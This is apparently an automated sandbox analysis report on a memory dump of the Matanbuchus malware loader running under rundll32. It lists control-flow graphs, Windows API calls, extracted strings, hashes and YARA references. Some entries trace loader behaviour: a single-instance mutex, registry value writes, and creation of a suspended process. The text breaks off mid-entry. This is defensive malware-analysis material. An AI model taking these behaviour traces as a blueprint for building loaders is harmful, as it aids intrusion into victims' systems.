7fa92f35-7fa92f66 2277->2280 2279->2277 2285 7fa92f68-7fa92fb1 2280->2285 2286 7fa92fb3 2280->2286 2283 7fa930eb 2281->2283 2284 7fa930df-7fa930e9 2281->2284 2287 7fa930f5-7fa93104 2283->2287 2284->2287 2285->2276 2286->2273 2288 7fa9310a-7fa93110 2287->2288 2289 7fa93205-7fa93235 2287->2289 2290 7fa93113-7fa9312c 2288->2290 2289->2281 2291 7fa9323b 2289->2291 2290->2289 2293 7fa93132-7fa93156 2290->2293 2292 7fa93245-7fa9329a GetPEB 2291->2292 2298 7fa932a0-7fa932fe 2292->2298 2294 7fa93160-7fa93180 2293->2294 2296 7fa93190-7fa931a7 2294->2296 2297 7fa93182-7fa931b3 2294->2297 2296->2294 2302 7fa93200 2297->2302 2303 7fa931b5-7fa931fe 2297->2303 2300 7fa9330c 2298->2300 2301 7fa93300-7fa9330a 2298->2301 2304 7fa93316-7fa93325 2300->2304 2301->2304 2302->2290 2303->2292 2305 7fa9332b-7fa93331 2304->2305 2306 7fa93426-7fa93456 2304->2306 2308 7fa93334-7fa9334d 2305->2308 2306->2298 2307 7fa9345c 2306->2307 2309 7fa93466-7fa93475 PathIsDirectoryW 2307->2309 2308->2306 2310 7fa93353-7fa93377 2308->2310 2311 7fa9347e 2309->2311 2312 7fa93477-7fa9347c 2309->2312 2313 7fa93381-7fa933a1 2310->2313 2314 7fa93480-7fa93483 2311->2314 2312->2314 2315 7fa933b1-7fa933c8 2313->2315 2316 7fa933a3-7fa933d4 2313->2316 2315->2313 2318 7fa93421 2316->2318 2319 7fa933d6-7fa9341f 2316->2319 2318->2308 2319->2309
                          APIs
                          • PathIsDirectoryW.SHLWAPI(?), ref: 7FA9346D
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryPath
                          • String ID:
                          • API String ID: 1580926078-0
                          • Opcode ID: bf1bc74431eba1dd0ce361fecfd5d007c7911795e9097ea6343043ab206bce54
                          • Instruction ID: 331d5bfcd63e254627432a13509ee66a782c71cbf635fbba2bc5adeab2dde104
                          • Opcode Fuzzy Hash: bf1bc74431eba1dd0ce361fecfd5d007c7911795e9097ea6343043ab206bce54
                          • Instruction Fuzzy Hash: D3729D78E042698FCB69CF58C990BDDBBB1BF89304F1081EAD849A7345D734AA85CF54
                          Function 7FAA83B0 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                          Download Yara Rule
                          APIs
                          • GetSystemInfo.KERNEL32(?), ref: 7FAA8547
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoSystem
                          • String ID:
                          • API String ID: 31276548-0
                          • Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                          • Instruction ID: df4bdc7290d9771f6dbd540884b4520b23dd26d7ba3d609c78e35434bc48538e
                          • Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                          • Instruction Fuzzy Hash: 3C618E78E052599FCB08CF98C590AEDFBB2BF48304F24819AD815AB349D735AA45CF94
                          Function 7FABDB5F Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1323 7fabdb5f-7fabdb72 call 7fabe000 1326 7fabdb78-7fabdb9a call 7fabd4cb 1323->1326 1327 7fabdb74-7fabdb76 1323->1327 1331 7fabdb9c-7fabdbdf call 7fabd596 call 7fabe238 call 7fabe299 call 7fabdbf4 call 7fabd737 call 7fabdc01 1326->1331 1332 7fabdc07-7fabdc20 call 7fabe077 call 7fabe000 1326->1332 1328 7fabdbe1-7fabdbf0 1327->1328 1331->1328 1343 7fabdc22-7fabdc28 1332->1343 1344 7fabdc31-7fabdc38 1332->1344 1343->1344 1349 7fabdc2a-7fabdc2c 1343->1349 1346 7fabdc3a-7fabdc3d 1344->1346 1347 7fabdc44-7fabdc58 dllmain_raw 1344->1347 1346->1347 1350 7fabdc3f-7fabdc42 1346->1350 1352 7fabdc5e-7fabdc6f dllmain_crt_dispatch 1347->1352 1353 7fabdd01-7fabdd08 1347->1353 1354 7fabdd0a-7fabdd19 1349->1354 1355 7fabdc75-7fabdc87 call 7fabafc0 1350->1355 1352->1353 1352->1355 1353->1354 1362 7fabdc89-7fabdc8b 1355->1362 1363 7fabdcb0-7fabdcb2 1355->1363 1362->1363 1364 7fabdc8d-7fabdcab call 7fabafc0 call 7fabdb5f dllmain_raw 1362->1364 1365 7fabdcb9-7fabdcca dllmain_crt_dispatch 1363->1365 1366 7fabdcb4-7fabdcb7 1363->1366 1364->1363 1365->1353 1367 7fabdccc-7fabdcfe dllmain_raw 1365->1367 1366->1353 1366->1365 1367->1353
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 7FABDBA6
                          • ___scrt_uninitialize_crt.LIBCMT ref: 7FABDBC0
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          • Opcode ID: a78b7c99252fcc0ec21645ec86c451d79d4b4a581486903e34e25d442d418862
                          • Instruction ID: 91da81478ec06c3f03be730537656ebf19b65edfed3901570032fe6c5d686efa
                          • Opcode Fuzzy Hash: a78b7c99252fcc0ec21645ec86c451d79d4b4a581486903e34e25d442d418862
                          • Instruction Fuzzy Hash: 8D413672E01319AFDB118F69CD44B9E3BBDEF857A0F10411DE816AB168C77C9D029BA0
                          Function 7FABDC0F Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1373 7fabdc0f-7fabdc20 call 7fabe000 1376 7fabdc22-7fabdc28 1373->1376 1377 7fabdc31-7fabdc38 1373->1377 1376->1377 1380 7fabdc2a-7fabdc2c 1376->1380 1378 7fabdc3a-7fabdc3d 1377->1378 1379 7fabdc44-7fabdc58 dllmain_raw 1377->1379 1378->1379 1381 7fabdc3f-7fabdc42 1378->1381 1382 7fabdc5e-7fabdc6f dllmain_crt_dispatch 1379->1382 1383 7fabdd01-7fabdd08 1379->1383 1384 7fabdd0a-7fabdd19 1380->1384 1385 7fabdc75-7fabdc87 call 7fabafc0 1381->1385 1382->1383 1382->1385 1383->1384 1388 7fabdc89-7fabdc8b 1385->1388 1389 7fabdcb0-7fabdcb2 1385->1389 1388->1389 1390 7fabdc8d-7fabdcab call 7fabafc0 call 7fabdb5f dllmain_raw 1388->1390 1391 7fabdcb9-7fabdcca dllmain_crt_dispatch 1389->1391 1392 7fabdcb4-7fabdcb7 1389->1392 1390->1389 1391->1383 1393 7fabdccc-7fabdcfe dllmain_raw 1391->1393 1392->1383 1392->1391 1393->1383
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: 5a31af3890adddd384dbf0ccbee8d9f7b98861929ab17501eea3d6442e63d023
                          • Instruction ID: 96b010e3f2054a9dc1cead499e330731dcd00147f08bec06222c835b5d5dea3a
                          • Opcode Fuzzy Hash: 5a31af3890adddd384dbf0ccbee8d9f7b98861929ab17501eea3d6442e63d023
                          • Instruction Fuzzy Hash: E6219272D01319AFCB228F65C944AAF3B7DEB89690F01411DFC069B22CD77D9D029BA0
                          Function 7FA87920 Relevance: 4.5, APIs: 3, Instructions: 25synchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1502 7fa87920-7fa87939 CreateMutexA 1503 7fa8793b-7fa8793d 1502->1503 1504 7fa8793f-7fa8794a GetLastError 1502->1504 1505 7fa8795f-7fa87962 1503->1505 1506 7fa8795a 1504->1506 1507 7fa8794c-7fa87958 CloseHandle 1504->1507 1506->1505 1507->1505
                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,7FABB249,?,?,7FABB249,?), ref: 7FA8792C
                          • GetLastError.KERNEL32(?,?,7FABB249), ref: 7FA8793F
                          • CloseHandle.KERNEL32(00000000,?,?,7FABB249), ref: 7FA87950
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateErrorHandleLastMutex
                          • String ID:
                          • API String ID: 4294037311-0
                          • Opcode ID: e60337c3c86834cf17125750d3af8cf2703e2a333c2e52f8e178b25ee21505d6
                          • Instruction ID: 16a96173a18986aeb5f389a0c9fffe6dcad7aa1ab43f3377165813bb7ff29fcd
                          • Opcode Fuzzy Hash: e60337c3c86834cf17125750d3af8cf2703e2a333c2e52f8e178b25ee21505d6
                          • Instruction Fuzzy Hash: E3E0D87D52820AFFD7419BB1C80578D37BAD708331F100A64F90EDB284D6BD9A909761
                          Function 7FABDA58 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1605 7fabda58-7fabda66 call 7fabe000 call 7fabd5c6 1609 7fabda6b-7fabda6e 1605->1609 1610 7fabdb45 1609->1610 1611 7fabda74-7fabda8c call 7fabd4cb 1609->1611 1612 7fabdb47-7fabdb56 1610->1612 1615 7fabda92-7fabdaa3 call 7fabd528 1611->1615 1616 7fabdb57-7fabdb5e call 7fabe077 1611->1616 1621 7fabdaf2-7fabdb00 call 7fabdb3b 1615->1621 1622 7fabdaa5-7fabdac7 call 7fabe26d call 7fabe22c call 7fabe24a call 7face66d 1615->1622 1621->1610 1627 7fabdb02-7fabdb0c call 7fabe267 1621->1627 1622->1621 1641 7fabdac9-7fabdad0 call 7fabd4fd 1622->1641 1633 7fabdb0e-7fabdb17 call 7fabd686 1627->1633 1634 7fabdb2d-7fabdb36 1627->1634 1633->1634 1640 7fabdb19-7fabdb2b 1633->1640 1634->1612 1640->1634 1641->1621 1645 7fabdad2-7fabdaef call 7face642 1641->1645 1645->1621
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 7FABDAA5
                            • Part of subcall function 7FABE22C: InitializeSListHead.KERNEL32(7FAFB228,7FABDAAF,7FAF25C0,00000010,7FABDA40,?,?,?,7FABDC68,?,00000001,?,?,00000001,?,7FAF2608), ref: 7FABE231
                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 7FABDB0F
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                          • String ID:
                          • API String ID: 3231365870-0
                          • Opcode ID: 8a23eaf5a25b37a4e4d00f917c8cd1ac19ac8fd7a43b50c191968759d279ecd5
                          • Instruction ID: 92bafe16d8be914b2e87c87c2ff058c917d3a8894e593ba9039bd391c4959259
                          • Opcode Fuzzy Hash: 8a23eaf5a25b37a4e4d00f917c8cd1ac19ac8fd7a43b50c191968759d279ecd5
                          • Instruction Fuzzy Hash: 03216A36A483468ADB00ABB4D505BCC3BFDEF29329F14020DC896AF1D9DB2D6045C657
                          Function 7FAD18DD Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1648 7fad18dd-7fad18e2 1649 7fad18e4-7fad18fc 1648->1649 1650 7fad18fe-7fad1902 1649->1650 1651 7fad190a-7fad1913 1649->1651 1650->1651 1654 7fad1904-7fad1908 1650->1654 1652 7fad1925 1651->1652 1653 7fad1915-7fad1918 1651->1653 1658 7fad1927-7fad1934 GetStdHandle 1652->1658 1656 7fad191a-7fad191f 1653->1656 1657 7fad1921-7fad1923 1653->1657 1655 7fad197f-7fad1983 1654->1655 1655->1649 1661 7fad1989-7fad198c 1655->1661 1656->1658 1657->1658 1659 7fad1936-7fad1938 1658->1659 1660 7fad1961-7fad1973 1658->1660 1659->1660 1662 7fad193a-7fad1943 GetFileType 1659->1662 1660->1655 1663 7fad1975-7fad1978 1660->1663 1662->1660 1664 7fad1945-7fad194e 1662->1664 1663->1655 1665 7fad1956-7fad1959 1664->1665 1666 7fad1950-7fad1954 1664->1666 1665->1655 1667 7fad195b-7fad195f 1665->1667 1666->1655 1667->1655
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 7FAD1929
                          • GetFileType.KERNEL32(00000000), ref: 7FAD193B
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileHandleType
                          • String ID:
                          • API String ID: 3000768030-0
                          • Opcode ID: be8c7a8a7c8d3ac941d21ac9be315d21dc60af83829a5e124ea3c9041e6ca954
                          • Instruction ID: fb205b2343056295dc4112f8e12ad6bab9e9c4d71287a5ba2ff9151942e0690c
                          • Opcode Fuzzy Hash: be8c7a8a7c8d3ac941d21ac9be315d21dc60af83829a5e124ea3c9041e6ca954
                          • Instruction Fuzzy Hash: 1811967E2087414AE721493E8C84652BAEAAB9A17CF340719F4B7961FDC23CE496C251

                          Non-executed Functions

                          Function 7FAD76EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoW.KERNEL32(?,2000000B,7FAD7A08,00000002,00000000,?,?,?,7FAD7A08,?,00000000), ref: 7FAD7783
                          • GetLocaleInfoW.KERNEL32(?,20001004,7FAD7A08,00000002,00000000,?,?,?,7FAD7A08,?,00000000), ref: 7FAD77AC
                          • GetACP.KERNEL32(?,?,7FAD7A08,?,00000000), ref: 7FAD77C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: e757ca8196d3514d73f6f690ed78689016915f157deb3966c886cc2c3f6b2954
                          • Instruction ID: 6b908deefab26fff2f096a2c927911834253369cafb24d7815ea8a40110bb072
                          • Opcode Fuzzy Hash: e757ca8196d3514d73f6f690ed78689016915f157deb3966c886cc2c3f6b2954
                          • Instruction Fuzzy Hash: F921A93A6213019AD71A8F34C905BC77377AB48A64B528D24FD07DB11CFB35E941C390
                          Function 7FAD78BF Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7FACEB5C: GetLastError.KERNEL32(?,00000008,7FAD360A), ref: 7FACEB60
                            • Part of subcall function 7FACEB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FACEC02
                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 7FAD79CB
                          • IsValidCodePage.KERNEL32(00000000), ref: 7FAD7A14
                          • IsValidLocale.KERNEL32(?,00000001), ref: 7FAD7A23
                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 7FAD7A6B
                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 7FAD7A8A
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                          • String ID:
                          • API String ID: 415426439-0
                          • Opcode ID: 0347432c804dd9a9c58a9af6ce747468f1d43c146f493357b787b24c89a8d1ee
                          • Instruction ID: 641cde69cebf474d06baa9c6cbf297db143020e8e31351d14af47ecd8544c253
                          • Opcode Fuzzy Hash: 0347432c804dd9a9c58a9af6ce747468f1d43c146f493357b787b24c89a8d1ee
                          • Instruction Fuzzy Hash: C5517F7AA10306ABDB44DFA5CD41BEE77B8EF08704F104129F956E715CE778AA408B61
                          Function 7FAD6F5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7FACEB5C: GetLastError.KERNEL32(?,00000008,7FAD360A), ref: 7FACEB60
                            • Part of subcall function 7FACEB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FACEC02
                          • GetACP.KERNEL32(?,?,?,?,?,?,7FACF5A2,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7FAD701C
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7FACF5A2,?,?,?,00000055,?,-00000050,?,?), ref: 7FAD7047
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7FAD71AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CodeInfoLocalePageValid
                          • String ID: utf8
                          • API String ID: 607553120-905460609
                          • Opcode ID: a1bbc3af38a4caf28fefb908b510b7f8a2ea2dde323c7f10d655de47240371aa
                          • Instruction ID: 15bc2633e30f7395911eb9aedb355f8601ef4a20eb66ec48bf66428011461c08
                          • Opcode Fuzzy Hash: a1bbc3af38a4caf28fefb908b510b7f8a2ea2dde323c7f10d655de47240371aa
                          • Instruction Fuzzy Hash: AE71F775610706AAEB199B74CD41BAA73BDEF08714F104169F907DB1ACEB7CF94087A0
                          Function 7FAD1B6C Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strrchr
                          • String ID:
                          • API String ID: 3213747228-0
                          • Opcode ID: 44ed88f6ba2c6c923b7e4f7c1f4b16af1dbdd87646cd4620f9ac410d0ade0b1b
                          • Instruction ID: fd645fdd7d945d7481bc249b08dce2c12a626efb72745663a8791f2e8792ada9
                          • Opcode Fuzzy Hash: 44ed88f6ba2c6c923b7e4f7c1f4b16af1dbdd87646cd4620f9ac410d0ade0b1b
                          • Instruction Fuzzy Hash: 24B117729053459FEB028F78C8917EEBBB5EF49360F14426AF845AB24DD63C9901C7A0
                          Function 7FABE077 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7FABE083
                          • IsDebuggerPresent.KERNEL32 ref: 7FABE14F
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7FABE168
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 7FABE172
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 781ec4c590d6b6eaddc842b21f9d8639d3920f36abf0af0e00e6da6945df8e46
                          • Instruction ID: 1782b17edab2f9afab0106d7e78eb71bdc6ed2e3478780690637c74f9a982256
                          • Opcode Fuzzy Hash: 781ec4c590d6b6eaddc842b21f9d8639d3920f36abf0af0e00e6da6945df8e46
                          • Instruction Fuzzy Hash: 89312A79C053189BDB10DFA5D989BCDBBB8FF18300F1041AAE40DAB250E7799A85CF45
                          Function 7FACB91E Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 402COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7FACB9C4
                          • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7FACB9E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Module$FileHandleName
                          • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                          • API String ID: 4146042529-3261600717
                          • Opcode ID: 5384f731f13a9612d74b0f6482b0e4f5aa06ef8276a2cc8ab4827f5768e3a3e6
                          • Instruction ID: e9beafe23d5c021c845a3a1197f42b569fc015d53481f5d7bd12803dbc44cd3b
                          • Opcode Fuzzy Hash: 5384f731f13a9612d74b0f6482b0e4f5aa06ef8276a2cc8ab4827f5768e3a3e6
                          • Instruction Fuzzy Hash: 87C1F431A0030AA7C7165B29CD49F9B77B9FF58340F440568FC069A21DFB3EEA41C6A1
                          Function 7FA6C450 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 353COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • n_chars < number_buffer.size() - 1, xrefs: 7FA6C6D9
                          • d, xrefs: 7FA6C590
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7FA6C52E, 7FA6C6D4
                          • d, xrefs: 7FA6C64C
                          • @, xrefs: 7FA6C6BD
                          • d, xrefs: 7FA6C6F5
                          • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7FA6C533
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                          • API String ID: 3758378126-3644039597
                          • Opcode ID: 1a4b29f88f88b80b0df76aadaf274120d6ff4e2b253de5a1247ba789386d628f
                          • Instruction ID: d563f914ca1d39ba13da7f281826165c8c752c9af9edbb5392ae3dbae8eaafc4
                          • Opcode Fuzzy Hash: 1a4b29f88f88b80b0df76aadaf274120d6ff4e2b253de5a1247ba789386d628f
                          • Instruction Fuzzy Hash: 28F1E278D01219DFDB15CF99C980B9DBBB2FF48305F1081AAD81AAB358D7386A84CF54
                          Function 7FA6C900 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 320COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                          • API String ID: 3839614884-178659603
                          • Opcode ID: 4b09179324c7a7427233782c449c7d0554c057118df2d7e01900f081ae23256a
                          • Instruction ID: e972c6f0c72d18b27ad956e5d9d8343029c65b792434ce92a2115aef27939466
                          • Opcode Fuzzy Hash: 4b09179324c7a7427233782c449c7d0554c057118df2d7e01900f081ae23256a
                          • Instruction Fuzzy Hash: 11E1E078E01219DFDB14CF99D981B9DBBB2FF48305F2081AAD519A7358D7386A80CF54
                          Function 7FABBB70 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 100registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,00000000,00000044,00000000), ref: 7FABBB99
                          • wsprintfW.USER32 ref: 7FABBBE6
                          • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7FABBC03
                          • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,?), ref: 7FABBC24
                          • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7FABBC44
                          • RegCloseKey.ADVAPI32(00000000), ref: 7FABBC5D
                          • RegCloseKey.ADVAPI32(00000000), ref: 7FABBC68
                            • Part of subcall function 7FABC347: GetTickCount.KERNEL32 ref: 7FABC365
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CountCreateOpenTickwsprintf
                          • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                          • API String ID: 730945307-550109914
                          • Opcode ID: 897ebb975e1c8a78e0ea5aa10bf1b2edbdc79dace1aaba857d64415da6d47152
                          • Instruction ID: e29ed6cfc6c861e1640f38930e5ef4796f11f0aca09fe2eb28800530a8081a5a
                          • Opcode Fuzzy Hash: 897ebb975e1c8a78e0ea5aa10bf1b2edbdc79dace1aaba857d64415da6d47152
                          • Instruction Fuzzy Hash: 08316B76A00218BADB11DBA5CC4AFEFBF7DEF09394F000465FA05A6054D738AB55DBA0
                          Function 7FAAC6B0 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 367COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$M_plus.e <= kGamma$M_plus.e >= kAlpha$d$d$d <= 9$p1 > 0$p2 <= (std::numeric_limits<std::uint64_t>::max)() / 10$p2 > delta
                          • API String ID: 0-2564281896
                          • Opcode ID: 678a95f5e8ad3ff43c4ae3a5cef8092bbb44476d139a0abcb852f72205ef714e
                          • Instruction ID: d6c74e5d9b27246b9c459e9c97811de084e8beb21110fcfa1cad1a8280eb3cfc
                          • Opcode Fuzzy Hash: 678a95f5e8ad3ff43c4ae3a5cef8092bbb44476d139a0abcb852f72205ef714e
                          • Instruction Fuzzy Hash: E4F11C75E04208EFDB04CF98D981ADDBBB6FF48304F108259E915AB358D739AA85CF50
                          Function 7FABBD7C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246processCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(?), ref: 7FABBDA9
                          • IsWow64Process.KERNEL32(00000000), ref: 7FABBDB0
                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7FABBDEC
                          • wsprintfW.USER32 ref: 7FABBE7A
                          • CloseHandle.KERNEL32(00000000), ref: 7FABC005
                          • CloseHandle.KERNEL32(00000000), ref: 7FABC010
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
